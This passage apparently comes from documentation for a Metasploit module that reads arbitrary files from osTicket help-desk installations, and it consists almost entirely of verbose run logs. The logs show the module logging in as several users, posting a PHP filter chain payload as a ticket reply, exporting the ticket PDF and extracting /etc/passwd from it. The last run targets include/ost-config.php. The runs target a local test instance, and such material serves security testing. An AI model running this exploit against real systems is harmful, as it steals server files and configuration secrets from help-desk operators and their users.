[*] submit_ticket_reply: Using textarea field 'c89d7750ba2621', payload=13646 bytes
|
||||
[*] submit_ticket_reply: POST /tickets.php with a=reply, id=2
|
||||
[*] submit_ticket_reply: POST response code=200, body=24114 bytes
|
||||
[*] submit_ticket_reply: Success indicators found=true
|
||||
[+] Reply posted successfully
|
||||
[*] Downloading ticket PDF...
|
||||
[*] download_ticket_pdf: Trying PDF export from /tickets.php
|
||||
[*] download_ticket_pdf: GET /tickets.php?a=print&id=2
|
||||
[*] download_ticket_pdf: Response code=200, Content-Type=application/pdf, magic="%PDF", size=54270
|
||||
[+] download_ticket_pdf: Got PDF (54270 bytes)
|
||||
[+] PDF downloaded (54270 bytes)
|
||||
[*] Extracting file from PDF...
|
||||
[*] extract_files_from_pdf: Processing PDF (54270 bytes)
|
||||
[*] extract_pdf_image_streams: Found image object (139060 bytes decompressed)
|
||||
[*] extract_pdf_image_streams: Found image object (1239 bytes decompressed)
|
||||
[*] extract_files_from_pdf: Found 2 image XObject streams
|
||||
[*] extract_files_from_pdf: Image #0: 139060 bytes, swapped to BGR
|
||||
[*] extract_files_from_pdf: Image #1: 1239 bytes, swapped to BGR
|
||||
[*] extract_data_from_bmp_stream: ISO-2022-KR marker found at offset 0 in 1239-byte stream
|
||||
[*] extract_data_from_bmp_stream: 1235 bytes after marker (nulls stripped)
|
||||
[*] First 96 bytes of data after marker and null-strip:
|
||||
[*] ascii: "root:x:0:0:root:/root:/bin/bash.daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin.bin:x:2:2:bin:/b"
|
||||
[*] hex: 72 6f 6f 74 3a 78 3a 30 3a 30 3a 72 6f 6f 74 3a 2f 72 6f 6f 74 3a 2f 62 69 6e 2f 62 61 73 68 0a 64 61 65 6d 6f 6e 3a 78 3a 31 3a 31 3a 64 61 65 6d 6f 6e 3a 2f 75 73 72 2f 73 62 69 6e 3a 2f 75 73 72 2f 73 62 69 6e 2f 6e 6f 6c 6f 67 69 6e 0a 62 69 6e 3a 78 3a 32 3a 32 3a 62 69 6e 3a 2f 62
|
||||
[*] Data looks like base64? false
|
||||
[*] Treating as plain (non-base64) - preview:
|
||||
[*] ascii: "root:x:0:0:root:/root:/bin/bash.daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin.bin:x:2:2:bin:/b"
|
||||
[*] hex: 72 6f 6f 74 3a 78 3a 30 3a 30 3a 72 6f 6f 74 3a 2f 72 6f 6f 74 3a 2f 62 69 6e 2f 62 61 73 68 0a 64 61 65 6d 6f 6e 3a 78 3a 31 3a 31 3a 64 61 65 6d 6f 6e 3a 2f 75 73 72 2f 73 62 69 6e 3a 2f 75 73 72 2f 73 62 69 6e 2f 6e 6f 6c 6f 67 69 6e 0a 62 69 6e 3a 78 3a 32 3a 32 3a 62 69 6e 3a 2f 62
|
||||
[+] extract_files_from_pdf: Image #1 yielded 1235 bytes of extracted data
|
||||
[*] extract_files_from_pdf: Fallback - scanning 12 raw streams
|
||||
[*] extract_files_from_pdf: Total extracted files: 1
|
||||
[+] Extracted 1235 bytes
|
||||
|
||||
======================================================================
|
||||
EXTRACTED FILE CONTENTS
|
||||
======================================================================
|
||||
|
||||
--- [/etc/passwd] (1235 bytes) ---
|
||||
root:x:0:0:root:/root:/bin/bash
|
||||
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
|
||||
bin:x:2:2:bin:/bin:/usr/sbin/nologin
|
||||
sys:x:3:3:sys:/dev:/usr/sbin/nologin
|
||||
sync:x:4:65534:sync:/bin:/bin/sync
|
||||
games:x:5:60:games:/usr/games:/usr/sbin/nologin
|
||||
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
|
||||
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
|
||||
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
|
||||
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
|
||||
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
|
||||
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
|
||||
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
|
||||
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
|
||||
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
|
||||
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
|
||||
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
|
||||
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
|
||||
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
|
||||
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
|
||||
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
|
||||
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
|
||||
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
|
||||
mysql:
|
||||
[+] Saved to: /home/tintin/.msf4/loot/20260222194304_default_127.0.0.1_osticket.etc_pas_543896.bin
|
||||
|
||||
[+] Exploitation complete
|
||||
[*] Running module against ::1
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[*] is_osticket?: Response code=200, body length=4943
|
||||
[*] is_osticket?: osTicket signature FOUND in response body
|
||||
[!] The service is running, but could not be validated. Target appears to be an osTicket installation
|
||||
[*] Target: ::1:8080
|
||||
[*] File to extract: /etc/passwd
|
||||
[*] Attempting authentication...
|
||||
[*] do_login: portal preference=auto, base_uri=/, username=test
|
||||
[*] do_login: Trying staff panel (/scp/) login...
|
||||
[*] osticket_login_scp: GET /scp/login.php
|
||||
[*] osticket_login_scp: GET response code=200, cookies=OSTSESSID=s0ksargvidhkv41th0url3m1ua;
|
||||
[*] extract_csrf_token: Searching HTML (6504 bytes) for __CSRFToken__
|
||||
[+] extract_csrf_token: Found token=e1a5096cc2f00526a4606567f866ad8fdcf67d22
|
||||
[*] osticket_login_scp: POST /scp/login.php with userid=test
|
||||
[*] osticket_login_scp: POST response code=200, url=, body contains userid=true
|
||||
[-] osticket_login_scp: Login FAILED (still see login form)
|
||||
[*] do_login: Staff panel login failed
|
||||
[*] do_login: Trying client portal login...
|
||||
[*] osticket_login_client: GET /login.php
|
||||
[*] osticket_login_client: GET response code=200, cookies=OSTSESSID=1ldkhkadfl2rqur16lnf4ru5od;
|
||||
[*] extract_csrf_token: Searching HTML (5213 bytes) for __CSRFToken__
|
||||
[+] extract_csrf_token: Found token=aa3f025a7693418fa66d8691f39bc60d28ed0791
|
||||
[*] osticket_login_client: POST /login.php with luser=test
|
||||
[*] osticket_login_client: POST response code=302, body contains luser=false
|
||||
[+] osticket_login_client: Login SUCCESS
|
||||
[+] do_login: Client portal login succeeded, cookies=OSTSESSID=1ldkhkadfl2rqur16lnf4ru5od;
|
||||
[+] Authenticated via client portal
|
||||
[*] Locating ticket...
|
||||
[*] find_ticket_id: GET /tickets.php (looking for ticket #527686)
|
||||
[*] find_ticket_id: Using cookies=OSTSESSID=1ldkhkadfl2rqur16lnf4ru5od;
|
||||
[*] find_ticket_id: Ticket listing response code=200, body=6856 bytes
|
||||
[*] find_ticket_id: Body Length:
|
||||
6856
|
||||
[+] find_ticket_id: Found ticket ID=2 from listing page
|
||||
[+] Ticket #527686 has internal ID: 2
|
||||
[*] Generating PHP filter chain payload...
|
||||
[*] Payload generated (13646 bytes)
|
||||
[*] Submitting payload as ticket reply...
|
||||
[*] submit_ticket_reply: GET /tickets.php?id=2 to fetch CSRF token
|
||||
[*] submit_ticket_reply: GET response code=200, body=23979 bytes
|
||||
[*] extract_csrf_token: Searching HTML (23979 bytes) for __CSRFToken__
|
||||
[+] extract_csrf_token: Found token=917409710733c0ab9c26758c5e4096531ded2441
|
||||
[*] submit_ticket_reply: Using textarea field '70211e92acc5d1', payload=13646 bytes
|
||||
[*] submit_ticket_reply: POST /tickets.php with a=reply, id=2
|
||||
[*] submit_ticket_reply: POST response code=200, body=38488 bytes
|
||||
[*] submit_ticket_reply: Success indicators found=true
|
||||
[+] Reply posted successfully
|
||||
[*] Downloading ticket PDF...
|
||||
[*] download_ticket_pdf: Trying PDF export from /tickets.php
|
||||
[*] download_ticket_pdf: GET /tickets.php?a=print&id=2
|
||||
[*] download_ticket_pdf: Response code=200, Content-Type=application/pdf, magic="%PDF", size=54429
|
||||
[+] download_ticket_pdf: Got PDF (54429 bytes)
|
||||
[+] PDF downloaded (54429 bytes)
|
||||
[*] Extracting file from PDF...
|
||||
[*] extract_files_from_pdf: Processing PDF (54429 bytes)
|
||||
[*] extract_pdf_image_streams: Found image object (139060 bytes decompressed)
|
||||
[*] extract_pdf_image_streams: Found image object (1239 bytes decompressed)
|
||||
[*] extract_files_from_pdf: Found 2 image XObject streams
|
||||
[*] extract_files_from_pdf: Image #0: 139060 bytes, swapped to BGR
|
||||
[*] extract_files_from_pdf: Image #1: 1239 bytes, swapped to BGR
|
||||
[*] extract_data_from_bmp_stream: ISO-2022-KR marker found at offset 0 in 1239-byte stream
|
||||
[*] extract_data_from_bmp_stream: 1235 bytes after marker (nulls stripped)
|
||||
[*] First 96 bytes of data after marker and null-strip:
|
||||
[*] ascii: "root:x:0:0:root:/root:/bin/bash.daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin.bin:x:2:2:bin:/b"
|
||||
[*] hex: 72 6f 6f 74 3a 78 3a 30 3a 30 3a 72 6f 6f 74 3a 2f 72 6f 6f 74 3a 2f 62 69 6e 2f 62 61 73 68 0a 64 61 65 6d 6f 6e 3a 78 3a 31 3a 31 3a 64 61 65 6d 6f 6e 3a 2f 75 73 72 2f 73 62 69 6e 3a 2f 75 73 72 2f 73 62 69 6e 2f 6e 6f 6c 6f 67 69 6e 0a 62 69 6e 3a 78 3a 32 3a 32 3a 62 69 6e 3a 2f 62
|
||||
[*] Data looks like base64? false
|
||||
[*] Treating as plain (non-base64) - preview:
|
||||
[*] ascii: "root:x:0:0:root:/root:/bin/bash.daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin.bin:x:2:2:bin:/b"
|
||||
[*] hex: 72 6f 6f 74 3a 78 3a 30 3a 30 3a 72 6f 6f 74 3a 2f 72 6f 6f 74 3a 2f 62 69 6e 2f 62 61 73 68 0a 64 61 65 6d 6f 6e 3a 78 3a 31 3a 31 3a 64 61 65 6d 6f 6e 3a 2f 75 73 72 2f 73 62 69 6e 3a 2f 75 73 72 2f 73 62 69 6e 2f 6e 6f 6c 6f 67 69 6e 0a 62 69 6e 3a 78 3a 32 3a 32 3a 62 69 6e 3a 2f 62
|
||||
[+] extract_files_from_pdf: Image #1 yielded 1235 bytes of extracted data
|
||||
[*] extract_files_from_pdf: Fallback - scanning 12 raw streams
|
||||
[*] extract_files_from_pdf: Total extracted files: 1
|
||||
[+] Extracted 1235 bytes
|
||||
|
||||
======================================================================
|
||||
EXTRACTED FILE CONTENTS
|
||||
======================================================================
|
||||
|
||||
--- [/etc/passwd] (1235 bytes) ---
|
||||
root:x:0:0:root:/root:/bin/bash
|
||||
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
|
||||
bin:x:2:2:bin:/bin:/usr/sbin/nologin
|
||||
sys:x:3:3:sys:/dev:/usr/sbin/nologin
|
||||
sync:x:4:65534:sync:/bin:/bin/sync
|
||||
games:x:5:60:games:/usr/games:/usr/sbin/nologin
|
||||
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
|
||||
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
|
||||
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
|
||||
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
|
||||
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
|
||||
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
|
||||
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
|
||||
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
|
||||
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
|
||||
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
|
||||
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
|
||||
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
|
||||
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
|
||||
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
|
||||
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
|
||||
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
|
||||
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
|
||||
mysql:
|
||||
[+] Saved to: /home/tintin/.msf4/loot/20260222194305_default_1_osticket.etc_pas_161216.bin
|
||||
|
||||
[+] Exploitation complete
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
|
||||
|
||||
### With Administrator user
|
||||
```
|
||||
msf auxiliary(gather/osticket_arbitrary_file_read) > set USERNAME administrator
|
||||
USERNAME => administrator
|
||||
msf auxiliary(gather/osticket_arbitrary_file_read) > set TICKET_NUMBER 527686
|
||||
TICKET_NUMBER => 527686
|
||||
msf auxiliary(gather/osticket_arbitrary_file_read) > set VERBOSE true
|
||||
VERBOSE => true
|
||||
msf auxiliary(gather/osticket_arbitrary_file_read) > set RHOSTS http://localhost:8080/
|
||||
RHOSTS => http://localhost:8080/
|
||||
msf auxiliary(gather/osticket_arbitrary_file_read) > set PASSWORD administrator
|
||||
PASSWORD => administrator
|
||||
msf auxiliary(gather/osticket_arbitrary_file_read) > run
|
||||
[*] Running module against 127.0.0.1
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[*] is_osticket?: Response code=200, body length=4943
|
||||
[*] is_osticket?: osTicket signature FOUND in response body
|
||||
[!] The service is running, but could not be validated. Target appears to be an osTicket installation
|
||||
[*] Target: 127.0.0.1:8080
|
||||
[*] File to extract: /etc/passwd
|
||||
[*] Attempting authentication...
|
||||
[*] do_login: portal preference=auto, base_uri=/, username=administrator
|
||||
[*] do_login: Trying staff panel (/scp/) login...
|
||||
[*] osticket_login_scp: GET /scp/login.php
|
||||
[*] osticket_login_scp: GET response code=200, cookies=OSTSESSID=1in45o31u3itsmsr3u5848gr83;
|
||||
[*] extract_csrf_token: Searching HTML (6504 bytes) for __CSRFToken__
|
||||
[+] extract_csrf_token: Found token=f467a6da2cdee133ab691be6cc479ad9909824b0
|
||||
[*] osticket_login_scp: POST /scp/login.php with userid=administrator
|
||||
[*] osticket_login_scp: POST response code=302, url=index.php, body contains userid=false
|
||||
[+] osticket_login_scp: Login SUCCESS
|
||||
[+] do_login: SCP login succeeded, cookies=OSTSESSID=1in45o31u3itsmsr3u5848gr83;
|
||||
[+] Authenticated via scp portal
|
||||
[*] Locating ticket...
|
||||
[*] find_ticket_id: GET /scp/tickets.php (looking for ticket #527686)
|
||||
[*] find_ticket_id: Using cookies=OSTSESSID=1in45o31u3itsmsr3u5848gr83;
|
||||
[*] find_ticket_id: Ticket listing response code=200, body=23649 bytes
|
||||
[*] find_ticket_id: Body Length:
|
||||
23649
|
||||
[+] find_ticket_id: Found ticket ID=1 from listing page
|
||||
[+] Ticket #527686 has internal ID: 1
|
||||
[*] Generating PHP filter chain payload...
|
||||
[*] Payload generated (13646 bytes)
|
||||
[*] Submitting payload as ticket reply...
|
||||
[*] acquire_lock_code: POST /scp/ajax.php/lock/ticket/1
|
||||
[+] acquire_lock_code: Got lock code from JSON response
|
||||
[*] submit_ticket_reply: GET /scp/tickets.php?id=1 to fetch CSRF token
|
||||
[*] submit_ticket_reply: GET response code=200, body=57517 bytes
|
||||
[*] extract_csrf_token: Searching HTML (57517 bytes) for __CSRFToken__
|
||||
[+] extract_csrf_token: Found token=f467a6da2cdee133ab691be6cc479ad9909824b0
|
||||
[*] submit_ticket_reply: Using textarea field 'response', payload=13646 bytes
|
||||
[*] submit_ticket_reply: POST /scp/tickets.php with a=reply, id=1
|
||||
[*] submit_ticket_reply: POST response code=302, body=13 bytes
|
||||
[+] submit_ticket_reply: Got 302 redirect - reply accepted
|
||||
[+] Reply posted successfully
|
||||
[*] Downloading ticket PDF...
|
||||
[*] download_ticket_pdf: Trying PDF export from /scp/tickets.php
|
||||
[*] download_ticket_pdf: GET /scp/tickets.php?a=print&id=1
|
||||
[*] download_ticket_pdf: Response code=200, Content-Type=application/pdf, magic="%PDF", size=71895
|
||||
[+] download_ticket_pdf: Got PDF (71895 bytes)
|
||||
[+] PDF downloaded (71895 bytes)
|
||||
[*] Extracting file from PDF...
|
||||
[*] extract_files_from_pdf: Processing PDF (71895 bytes)
|
||||
[*] extract_pdf_image_streams: Found image object (139060 bytes decompressed)
|
||||
[*] extract_pdf_image_streams: Found image object (1239 bytes decompressed)
|
||||
[*] extract_files_from_pdf: Found 2 image XObject streams
|
||||
[*] extract_files_from_pdf: Image #0: 139060 bytes, swapped to BGR
|
||||
[*] extract_files_from_pdf: Image #1: 1239 bytes, swapped to BGR
|
||||
[*] extract_data_from_bmp_stream: ISO-2022-KR marker found at offset 0 in 1239-byte stream
|
||||
[*] extract_data_from_bmp_stream: 1235 bytes after marker (nulls stripped)
|
||||
[*] First 96 bytes of data after marker and null-strip:
|
||||
[*] ascii: "root:x:0:0:root:/root:/bin/bash.daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin.bin:x:2:2:bin:/b"
|
||||
[*] hex: 72 6f 6f 74 3a 78 3a 30 3a 30 3a 72 6f 6f 74 3a 2f 72 6f 6f 74 3a 2f 62 69 6e 2f 62 61 73 68 0a 64 61 65 6d 6f 6e 3a 78 3a 31 3a 31 3a 64 61 65 6d 6f 6e 3a 2f 75 73 72 2f 73 62 69 6e 3a 2f 75 73 72 2f 73 62 69 6e 2f 6e 6f 6c 6f 67 69 6e 0a 62 69 6e 3a 78 3a 32 3a 32 3a 62 69 6e 3a 2f 62
|
||||
[*] Data looks like base64? false
|
||||
[*] Treating as plain (non-base64) - preview:
|
||||
[*] ascii: "root:x:0:0:root:/root:/bin/bash.daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin.bin:x:2:2:bin:/b"
|
||||
[*] hex: 72 6f 6f 74 3a 78 3a 30 3a 30 3a 72 6f 6f 74 3a 2f 72 6f 6f 74 3a 2f 62 69 6e 2f 62 61 73 68 0a 64 61 65 6d 6f 6e 3a 78 3a 31 3a 31 3a 64 61 65 6d 6f 6e 3a 2f 75 73 72 2f 73 62 69 6e 3a 2f 75 73 72 2f 73 62 69 6e 2f 6e 6f 6c 6f 67 69 6e 0a 62 69 6e 3a 78 3a 32 3a 32 3a 62 69 6e 3a 2f 62
|
||||
[+] extract_files_from_pdf: Image #1 yielded 1235 bytes of extracted data
|
||||
[*] extract_files_from_pdf: Fallback - scanning 16 raw streams
|
||||
[*] extract_files_from_pdf: Total extracted files: 1
|
||||
[+] Extracted 1235 bytes
|
||||
|
||||
======================================================================
|
||||
EXTRACTED FILE CONTENTS
|
||||
======================================================================
|
||||
|
||||
--- [/etc/passwd] (1235 bytes) ---
|
||||
root:x:0:0:root:/root:/bin/bash
|
||||
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
|
||||
bin:x:2:2:bin:/bin:/usr/sbin/nologin
|
||||
sys:x:3:3:sys:/dev:/usr/sbin/nologin
|
||||
sync:x:4:65534:sync:/bin:/bin/sync
|
||||
games:x:5:60:games:/usr/games:/usr/sbin/nologin
|
||||
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
|
||||
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
|
||||
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
|
||||
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
|
||||
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
|
||||
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
|
||||
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
|
||||
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
|
||||
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
|
||||
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
|
||||
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
|
||||
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
|
||||
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
|
||||
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
|
||||
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
|
||||
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
|
||||
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
|
||||
mysql:
|
||||
[+] Saved to: /home/tintin/.msf4/loot/20260222194158_default_127.0.0.1_osticket.etc_pas_205832.bin
|
||||
|
||||
[+] Exploitation complete
|
||||
[*] Running module against ::1
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[*] is_osticket?: Response code=200, body length=4943
|
||||
[*] is_osticket?: osTicket signature FOUND in response body
|
||||
[!] The service is running, but could not be validated. Target appears to be an osTicket installation
|
||||
[*] Target: ::1:8080
|
||||
[*] File to extract: /etc/passwd
|
||||
[*] Attempting authentication...
|
||||
[*] do_login: portal preference=auto, base_uri=/, username=administrator
|
||||
[*] do_login: Trying staff panel (/scp/) login...
|
||||
[*] osticket_login_scp: GET /scp/login.php
|
||||
[*] osticket_login_scp: GET response code=200, cookies=OSTSESSID=qqa1df1k3ajku81n4vbkloeibq;
|
||||
[*] extract_csrf_token: Searching HTML (6504 bytes) for __CSRFToken__
|
||||
[+] extract_csrf_token: Found token=1ddff80315e6dcc127eb115ccf65e4307c1225aa
|
||||
[*] osticket_login_scp: POST /scp/login.php with userid=administrator
|
||||
[*] osticket_login_scp: POST response code=302, url=index.php, body contains userid=false
|
||||
[+] osticket_login_scp: Login SUCCESS
|
||||
[+] do_login: SCP login succeeded, cookies=OSTSESSID=qqa1df1k3ajku81n4vbkloeibq;
|
||||
[+] Authenticated via scp portal
|
||||
[*] Locating ticket...
|
||||
[*] find_ticket_id: GET /scp/tickets.php (looking for ticket #527686)
|
||||
[*] find_ticket_id: Using cookies=OSTSESSID=qqa1df1k3ajku81n4vbkloeibq;
|
||||
[*] find_ticket_id: Ticket listing response code=200, body=23647 bytes
|
||||
[*] find_ticket_id: Body Length:
|
||||
23647
|
||||
[+] find_ticket_id: Found ticket ID=1 from listing page
|
||||
[+] Ticket #527686 has internal ID: 1
|
||||
[*] Generating PHP filter chain payload...
|
||||
[*] Payload generated (13646 bytes)
|
||||
[*] Submitting payload as ticket reply...
|
||||
[*] acquire_lock_code: POST /scp/ajax.php/lock/ticket/1
|
||||
[+] acquire_lock_code: Got lock code from JSON response
|
||||
[*] submit_ticket_reply: GET /scp/tickets.php?id=1 to fetch CSRF token
|
||||
[*] submit_ticket_reply: GET response code=200, body=73937 bytes
|
||||
[*] extract_csrf_token: Searching HTML (73937 bytes) for __CSRFToken__
|
||||
[+] extract_csrf_token: Found token=1ddff80315e6dcc127eb115ccf65e4307c1225aa
|
||||
[*] submit_ticket_reply: Using textarea field 'response', payload=13646 bytes
|
||||
[*] submit_ticket_reply: POST /scp/tickets.php with a=reply, id=1
|
||||
[*] submit_ticket_reply: POST response code=302, body=13 bytes
|
||||
[+] submit_ticket_reply: Got 302 redirect - reply accepted
|
||||
[+] Reply posted successfully
|
||||
[*] Downloading ticket PDF...
|
||||
[*] download_ticket_pdf: Trying PDF export from /scp/tickets.php
|
||||
[*] download_ticket_pdf: GET /scp/tickets.php?a=print&id=1
|
||||
[*] download_ticket_pdf: Response code=200, Content-Type=application/pdf, magic="%PDF", size=72070
|
||||
[+] download_ticket_pdf: Got PDF (72070 bytes)
|
||||
[+] PDF downloaded (72070 bytes)
|
||||
[*] Extracting file from PDF...
|
||||
[*] extract_files_from_pdf: Processing PDF (72070 bytes)
|
||||
[*] extract_pdf_image_streams: Found image object (139060 bytes decompressed)
|
||||
[*] extract_pdf_image_streams: Found image object (1239 bytes decompressed)
|
||||
[*] extract_files_from_pdf: Found 2 image XObject streams
|
||||
[*] extract_files_from_pdf: Image #0: 139060 bytes, swapped to BGR
|
||||
[*] extract_files_from_pdf: Image #1: 1239 bytes, swapped to BGR
|
||||
[*] extract_data_from_bmp_stream: ISO-2022-KR marker found at offset 0 in 1239-byte stream
|
||||
[*] extract_data_from_bmp_stream: 1235 bytes after marker (nulls stripped)
|
||||
[*] First 96 bytes of data after marker and null-strip:
|
||||
[*] ascii: "root:x:0:0:root:/root:/bin/bash.daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin.bin:x:2:2:bin:/b"
|
||||
[*] hex: 72 6f 6f 74 3a 78 3a 30 3a 30 3a 72 6f 6f 74 3a 2f 72 6f 6f 74 3a 2f 62 69 6e 2f 62 61 73 68 0a 64 61 65 6d 6f 6e 3a 78 3a 31 3a 31 3a 64 61 65 6d 6f 6e 3a 2f 75 73 72 2f 73 62 69 6e 3a 2f 75 73 72 2f 73 62 69 6e 2f 6e 6f 6c 6f 67 69 6e 0a 62 69 6e 3a 78 3a 32 3a 32 3a 62 69 6e 3a 2f 62
|
||||
[*] Data looks like base64? false
|
||||
[*] Treating as plain (non-base64) - preview:
|
||||
[*] ascii: "root:x:0:0:root:/root:/bin/bash.daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin.bin:x:2:2:bin:/b"
|
||||
[*] hex: 72 6f 6f 74 3a 78 3a 30 3a 30 3a 72 6f 6f 74 3a 2f 72 6f 6f 74 3a 2f 62 69 6e 2f 62 61 73 68 0a 64 61 65 6d 6f 6e 3a 78 3a 31 3a 31 3a 64 61 65 6d 6f 6e 3a 2f 75 73 72 2f 73 62 69 6e 3a 2f 75 73 72 2f 73 62 69 6e 2f 6e 6f 6c 6f 67 69 6e 0a 62 69 6e 3a 78 3a 32 3a 32 3a 62 69 6e 3a 2f 62
|
||||
[+] extract_files_from_pdf: Image #1 yielded 1235 bytes of extracted data
|
||||
[*] extract_files_from_pdf: Fallback - scanning 16 raw streams
|
||||
[*] extract_files_from_pdf: Total extracted files: 1
|
||||
[+] Extracted 1235 bytes
|
||||
|
||||
======================================================================
|
||||
EXTRACTED FILE CONTENTS
|
||||
======================================================================
|
||||
|
||||
--- [/etc/passwd] (1235 bytes) ---
|
||||
root:x:0:0:root:/root:/bin/bash
|
||||
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
|
||||
bin:x:2:2:bin:/bin:/usr/sbin/nologin
|
||||
sys:x:3:3:sys:/dev:/usr/sbin/nologin
|
||||
sync:x:4:65534:sync:/bin:/bin/sync
|
||||
games:x:5:60:games:/usr/games:/usr/sbin/nologin
|
||||
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
|
||||
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
|
||||
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
|
||||
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
|
||||
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
|
||||
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
|
||||
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
|
||||
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
|
||||
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
|
||||
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
|
||||
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
|
||||
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
|
||||
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
|
||||
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
|
||||
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
|
||||
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
|
||||
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
|
||||
mysql:
|
||||
[+] Saved to: /home/tintin/.msf4/loot/20260222194159_default_1_osticket.etc_pas_624998.bin
|
||||
|
||||
[+] Exploitation complete
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
|
||||
### Without Specifying Ticket Number
|
||||
|
||||
```
|
||||
msf auxiliary(gather/osticket_arbitrary_file_read) > set USERNAME newuser
|
||||
USERNAME => newuser
|
||||
msf auxiliary(gather/osticket_arbitrary_file_read) > set VERBOSE true
|
||||
VERBOSE => true
|
||||
msf auxiliary(gather/osticket_arbitrary_file_read) > set RHOSTS http://localhost:8080/
|
||||
RHOSTS => http://localhost:8080/
|
||||
msf auxiliary(gather/osticket_arbitrary_file_read) > set PASSWORD newuser
|
||||
PASSWORD => newuser
|
||||
msf auxiliary(gather/osticket_arbitrary_file_read) > run
|
||||
[*] Running module against 127.0.0.1
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[*] is_osticket?: Response code=200, body length=4943
|
||||
[*] is_osticket?: osTicket signature FOUND in response body
|
||||
[!] The service is running, but could not be validated. Target appears to be an osTicket installation
|
||||
[*] Target: 127.0.0.1:8080
|
||||
[*] File to extract: include/ost-config.php
|
||||
[*] Attempting authentication...
|
||||
[*] do_login: portal preference=auto, base_uri=/, username=newuser
|
||||
[*] do_login: Trying staff panel (/scp/) login...
|
||||
[*] osticket_login_scp: GET /scp/login.php
|
